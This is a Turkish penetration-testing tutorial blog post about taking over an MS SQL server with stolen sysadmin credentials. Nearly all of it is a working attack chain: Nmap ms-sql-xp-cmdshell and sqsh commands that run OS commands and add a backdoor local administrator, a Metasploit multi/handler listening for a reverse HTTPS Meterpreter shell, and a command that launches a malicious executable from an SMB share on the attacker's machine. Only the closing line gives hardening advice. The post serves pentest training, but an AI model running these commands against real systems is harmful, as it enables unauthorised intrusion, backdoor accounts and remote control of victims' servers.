Nmap ms-sql-xp-cmdshell Betiği ve Elde Edilen MS SQL Veritabanı Kimlik Bilgileri ile MS SQL Veritabanı Sunucusuna Meterpreter Bağlantısı Elde Edilmesi

0
56
views
Sızma testleri sırasında, bir şekilde elde edilen kimlik bilgileri (kullanıcı adı ve parola) kullanılarak MS SQL veritabanı uygulamasına erişim sağlanmaya çalışılır. Bu yazıda erişim bilgileri (IP, kullanıcı adı ve parolası) elde edilmiş bir MS SQL veritabanı sunucusuna Nmap ms-sql-xp-cmdshell betiği ile Meterpreter bağlantısı gerçekleştirilecektir.

Bu yazıda kullanılacak Kali bilgisayarın IP adresi 172.22.71.5, MS SQL veritabanının kurulu olduğu Windows Server 2008 R2 sunucunun IP adresi ise 172.22.71.247 olduğu ve sysadmin rolündeki “test” veritabanı hesabının parolasının “test” olarak tespit edildiğini varsayalım.

Nmap ms-sql-xp-cmdshell betiğinin genel seçenekleri aşağıdaki gibi ayarlanıp çalıştırılabilir.

nmap 172.22.71.247 -p1433 –script ms-sql-xp-cmdshell –script-args=mssql.username=test,mssql.password=test,ms-sql-xp-cmdshell.cmd=’whoami && net user’

obtaining-meterpreter-session-by-using-obtained-ms-sql-database-authentication-informations-via-nmap-ms-sql-xp-cmdshell-script-01

Yukarıdaki ekran görüntüsünde 2 adet komut (“whoami” ve “net user”) çalıştırılmıştır. Bunun yerine, paylaşımdaki zararlı bir yazılım çalıştırılabilir ve bekleyen multi/handler tarafından bu talep yakalanabilir.

 

Not: Benzer olarak sqsh aracı ile de komut çalıştırılabilir. Örneğin;

sqsh -S 10.11.1.31 -U test -P test
xp_cmdshell ‘net user Yonetici Yy123456 /add’
go
xp_cmdshell ‘net localgroup Administrators Yonetici /add’
go

 

Meterpreter komut satırı elde etmek için ve saldırgana ait Kali bilgisayara ters HTTPS Meterpreter bağlantısı kuracak olan zararlı bir uygulama dosyasının oluşturulduğunu varsayalım. Bu uygulama Nmap ms-sql-xp-cmdshell betiğine parametre olarak verilecek ve çalışması sağlanacaktır.

obtaining-meterpreter-session-by-using-obtained-ms-sql-database-authentication-informations-via-nmap-ms-sql-xp-cmdshell-script-02

Kali sunucuda SAMBA sunucu uygulamasının yüklü olduğunu varsayalım. Kali bilgisayarda, “paylasim$” adlı gizli bir paylaşım dizinine herkes (everyone) için okuma ve yazma izni verilmiş olsun.

Oluşturulan uygulamanın gerçekleştireceği ters HTTPS Meterpreter bağlantısını dinleyecek olan MSF multi-handler istismar modülü aşağıdaki gibi ayarlanabilir.

use exploit/multi/handler
show options
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 172.22.71.5
set LPORT 443
set ExitOnSession false
exploit -j

obtaining-meterpreter-session-by-using-obtained-ms-sql-database-authentication-informations-via-nmap-ms-sql-xp-cmdshell-script-03

Nmap ms-sql-xp-cmdshell betiği paylaşımdaki uygulamayı başlatması için aşağıdaki gibi ayarlanıp çalıştırılabilir.

nmap 172.22.71.247 -p1433 –script ms-sql-xp-cmdshell –script-args=mssql.username=test,mssql.password=test,ms-sql-xp-cmdshell.cmd=’start \\172.22.71.5\paylasim$\Zararli1.exe’

Böylece, MSF multi-handler istismar modülü üzerinde gelen talep yakalanmıştır.

sessions
sessions -i 1
getuid

obtaining-meterpreter-session-by-using-obtained-ms-sql-database-authentication-informations-via-nmap-ms-sql-xp-cmdshell-script-05

Böylece Kali bilgisayarın diskinde bulunan zararlı yazılım, Windows makinenin diskine kaydedilmeden, Windows bilgisayarın belleğinde (RAM) çalışacaktır. Sonuçta da ters bir HTTPS bağlantı talebi olacak, Kali üzerindeki dinleyici tarafından yakalanmıştır. Ayrıca yukarıdaki ekran görüntüsünde de görüldüğü gibi MS SQLSERVER servisini çalıştıran hesabın yetkileri ile Meterpreter bağlantısı elde edilmiştir. Eğer MS SQLSERVER servisi SYSTEM yetkileri ile çalışmış olsaydı, SYSTEM yetkileri elde edilirdi. Bunun yanında “sa” hesabı yerine, işletim sisteminde kod çalıştırma yetkisi olan başka bir hesap da kullanılabilirdi. Bu sebeple, gereksiz kullanıcı hesaplarının ve yetkilerinin kaldırılması, mevcut parolaların oldukça karmaşık olması tavsiye edilmektedir.

 

CEVAP VER

Yorumunuzu giriniz
İsminizi giriniz